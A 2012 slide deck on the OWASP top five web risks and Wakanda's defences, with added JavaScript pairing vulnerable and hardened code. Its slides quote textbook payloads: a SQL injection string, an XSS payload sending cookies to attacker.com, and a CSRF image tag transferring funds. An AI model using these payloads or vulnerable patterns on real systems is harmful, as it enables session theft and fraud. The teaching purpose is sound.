Wakanda and the Top 5 Security Risks by Alexandre Morgaut

Wakanda and the top 5 security risks - JS.everywhere(2012) Europe


Page 1

Wakanda and the Top 5 Security Risks

by Alexandre Morgaut

Page 2

Presentation

• Wakanda Community manager

• W3C AC member

• Web Architect

• JS Expert, REST Lover, NoSQL Fanboy

• W3C "jseverywhere" community group

@amorgaut

Page 3

Agenda

• The Open Web Application Security Project

• Top 10 Application Security Risks

• Zoom on Top 5

• A1 - Injection

• A2 - Cross-Site Scripting (XSS)

• A3 - Broken Authentication & Session Management

• A4 - Insecure Direct Object Reference

• A5 - Cross Site Request Forgery (CSRF)

Page 4

OWASP

• The Open Web Application Security Project

• started in 2001 by Mark Curphey and Dennis Groves

• includes corporations, educational organizations, and individuals

• Cheat Sheets, Training, Books

• AppSec Conferences

• TOP 10 Security Risks

https://www.owasp.org

Page 5

Top 10 Risks

• A1 - Injection

• A2 - Cross-Site Scripting (XSS)

• A3 - Broken Authentication & Session Management

• A4 - Insecure Direct Object Reference

• A5 - Cross Site Request Forgery (CSRF)

• A6 - Security Misconfiguration

• A7 - Insecure Cryptographic Storage

• A8 - Failure to Restrict URL Access

• A9 - Insufficient Transport Layer Protection

• A10 - Unvalidated Redirects and Forwards

Page 6

Injection

• Attacks

• SQL Injections, JS injections

• deferred Injections

Page 7

SQL Injection

query = "SELECT * FROM accounts WHERE custID='" + request.getParameter("id") +"'";

http://example.com/app/accountView?id=' or '1'='1

Page 8

Injection

• Attacks

• SQL Injections, JS injections

• deferred Injections

• Preventions

• Input check, query parameters

• Eval is Evil

• new Function() == deferred eval()

• no dynamically created JS query expression

Page 9

Wakanda Security

• NoSQL

• Query parameters

• User Access Right at the Database level

• CRUD + execution Access Rights

• Restricting queries

• onRestrictingQuery handler
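
The injection on the SQL Injection slide, replayed as an added JavaScript example (not code from the talk or from Wakanda): an in-memory table and a toy evaluator for the slide's WHERE clause, with the concatenated query next to its parameterised form. Table contents and function names are constructed.

```javascript
// Added example (not from the talk): the SQL Injection slide replayed against an
// in-memory table. The "engine" is a toy evaluator for the WHERE shapes used on
// the slide; it exists only to make the difference between string concatenation
// and a bound parameter observable.

// Constructed sample table.
const accounts = [
  { custID: "42", owner: "alice" },
  { custID: "43", owner: "bob" },
  { custID: "44", owner: "carol" },
];

// Evaluate  <col>='<lit>'  or  '<lit>'='<lit>'  or  <col>=?  terms joined by OR.
// A ? placeholder is filled from params at comparison time, never pasted into
// the text, so a bound value may contain quotes or OR without changing the query.
function evalWhere(where, row, params = []) {
  let next = 0;
  return where.split(/\s+or\s+/i).some((term) => {
    const m = term.trim().match(/^('?)([^'=?]*)\1\s*=\s*(?:'([^']*)'|(\?))$/);
    if (!m) throw new Error("unsupported term: " + term);
    const left = m[1] ? m[2] : row[m[2]];        // quoted literal or column value
    const right = m[4] ? params[next++] : m[3];  // bound parameter or literal
    return left === right;
  });
}

// Vulnerable, same shape as the slide: the request parameter becomes SQL text.
function queryUnsafe(id) {
  const sql = "SELECT * FROM accounts WHERE custID='" + id + "'";
  return accounts.filter((row) => evalWhere(sql.split(" WHERE ")[1], row));
}

// Hardened ("query parameters"): the SQL text is constant, the value is bound.
function querySafe(id) {
  const sql = "SELECT * FROM accounts WHERE custID=?";
  return accounts.filter((row) => evalWhere(sql.split(" WHERE ")[1], row, [id]));
}

// The id from the slide's URL:  accountView?id=' or '1'='1
const injectedId = "' or '1'='1";
```

With the slide's id the concatenated query returns every row, while the bound form treats the same string as one (non-existent) customer id.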

Page 10

Cross-Site Scripting (XSS)

• Attacks

• stored, reflected, DOM based

• JS injection in the UI

Page 11

XSS Attack

page += "<input name='creditcard' type='TEXT' value='" + request.getParameter("CC") + "'>";

http://example.com/?CC='><script>document.location='http://www.attacker.com/cgi-bin/cookie.cgi?foo='+document.cookie</script>'

Page 14

Cross-Site Scripting (XSS)

• Attacks

• stored, reflected, DOM based

• JS injection in the UI

• Prevention

• validate any input

• escape output

Page 15

Wakanda Security

• Static HTML files

• Data inclusion based on datasources

• output escaped by default

• Beware

• WYSIWYG widget + on Row Draw

• deferred effect
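
The reflected XSS from the slides above as an added JavaScript example (not from the talk or from Wakanda): the vulnerable concatenation next to an output-escaped version, which is the "escape output" rule, and a field-level check for "validate any input". Function names are constructed.

```javascript
// Added example (not from the talk): the reflected XSS slide in JavaScript.
// renderUnsafe() keeps the vulnerable concatenation; renderSafe() applies the
// "escape output" rule (what Wakanda's datasource binding does by default), and
// isValidCardInput() applies "validate any input" for this particular field.

// Escape the characters that can break out of HTML text or a quoted attribute.
function escapeHtml(value) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;" };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Vulnerable, same shape as  page += "<input ... value='" + CC + "'>";
function renderUnsafe(cc) {
  return "<input name='creditcard' type='TEXT' value='" + cc + "'>";
}

// Hardened: identical markup, but the untrusted value is escaped on output.
function renderSafe(cc) {
  return "<input name='creditcard' type='TEXT' value='" + escapeHtml(cc) + "'>";
}

// Input validation for this field: a card number is 12 to 19 digits, nothing else.
function isValidCardInput(cc) {
  return /^\d{12,19}$/.test(cc);
}

// Did a <script> element appear that the template itself never wrote?
function containsScript(html) {
  return /<script\b/i.test(html);
}

// The CC value from the slide's URL, used to compare the two renderers.
const slidePayload =
  "'><script>document.location='http://www.attacker.com/cgi-bin/cookie.cgi?foo='+document.cookie</script>'";
```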

Page 16

Broken Authentication & Session Management

• Attacks

• session fixation in URL or Form

• session hijacking

Page 17

Broken Authentication & Session Management

http://example.com/sale/saleitems;jsessionid=2P0OC2JDPXM0OQSNDLPSKHCJUN2JV?dest=Hawaii

Page 18

Broken Authentication & Session Management

• Attacks

• session fixation in URL or Form

• session hijacking

• Prevention

• check session owner

• session in HTTP only cookie

• reasonable timeout

Page 19

Wakanda Security

• Session IDs managed automatically

• HTTP only restriction

• No session ID in URL or Form

• Check of user session owner

• Check of user-agent session owner

Page 20

Insecure Direct Object Reference

• Attacks

• changed accessed resource URL

Page 21

Insecure Direct Object Reference

query = "SELECT * FROM accts WHERE account = ?";
pstmt = connection.prepareStatement(query, ...);
pstmt.setString(1, request.getParameter("acct"));
results = pstmt.executeQuery();

http://example.com/app/accountInfo?acct=notmyacct

Page 24

Insecure Direct Object Reference

• Attacks

• changed accessed resource URL

• Prevention

• Indirect resource reference

• Check all resource access rights

Page 25

Wakanda Security

• Access always checked by the REST API

• User Authenticated at database level

• Restricting Queries

• Extended DataClass

• Current User or Current Group check
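
The accountInfo?acct=... slide as an added JavaScript example (not from the talk or from Wakanda): the prepared statement stops injection but not this lookup, so the unchecked handler sits next to the two preventions listed above, a current-user/current-group check and an indirect, per-session reference map. Account data, the session shape and the "admin" group name are constructed.

```javascript
// Added example (not from the talk): the IDOR slide in JavaScript. Binding the
// parameter stops injection but not this attack; the two fixes below are the
// ones the slide lists. Data, session shape and group name are constructed.

// Constructed data: accounts keyed by their real identifier.
const accounts = new Map([
  ["acct-1001", { owner: "alice", balance: 120 }],
  ["acct-1002", { owner: "bob", balance: 75 }],
]);

// Vulnerable: returns whatever record the request names (no access check).
function accountInfoUnsafe(req) {
  return accounts.get(req.query.acct) || null;
}

// Fix 1 ("check all resource access rights"): the record must belong to the
// current user, or the current user must be in the admin group.
function accountInfoChecked(req) {
  const acct = accounts.get(req.query.acct);
  if (!acct) return null;
  const { user, groups } = req.session;
  if (acct.owner !== user && !groups.includes("admin")) {
    throw new Error("forbidden");   // a 403 in a real handler
  }
  return acct;
}

// Fix 2 ("indirect resource reference"): at login each session gets its own
// list of the identifiers that user may reach; the public reference is the
// position in that list, so real identifiers never appear in a URL.
function buildReferenceMap(user) {
  const refs = [];
  for (const [id, acct] of accounts) if (acct.owner === user) refs.push(id);
  return refs;
}

function accountInfoIndirect(req) {
  const id = req.session.refs[Number(req.query.ref)];
  return id ? accounts.get(id) : null;   // out-of-range or non-numeric ref: nothing
}
```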

Page 26

Cross-Site Request Forgery (CSRF)

• Attacks

• HTTP request unintentionally sent

Page 27

Cross-Site Request Forgery (CSRF)

Transfer API

http://app.com/transferFunds?amount=1500&destAccount=4673243243

Give a Picture URL

<img src="http://app.com/transferFunds?amount=1500&destAccount=AttackerAccount#" width="0" height="0">

Page 32

Cross-Site Request Forgery (CSRF)

• Attacks

• HTTP request unintentionally sent

• Prevention

• validate any input

• use URL manipulations APIs

• escape output

• use Tokens in forms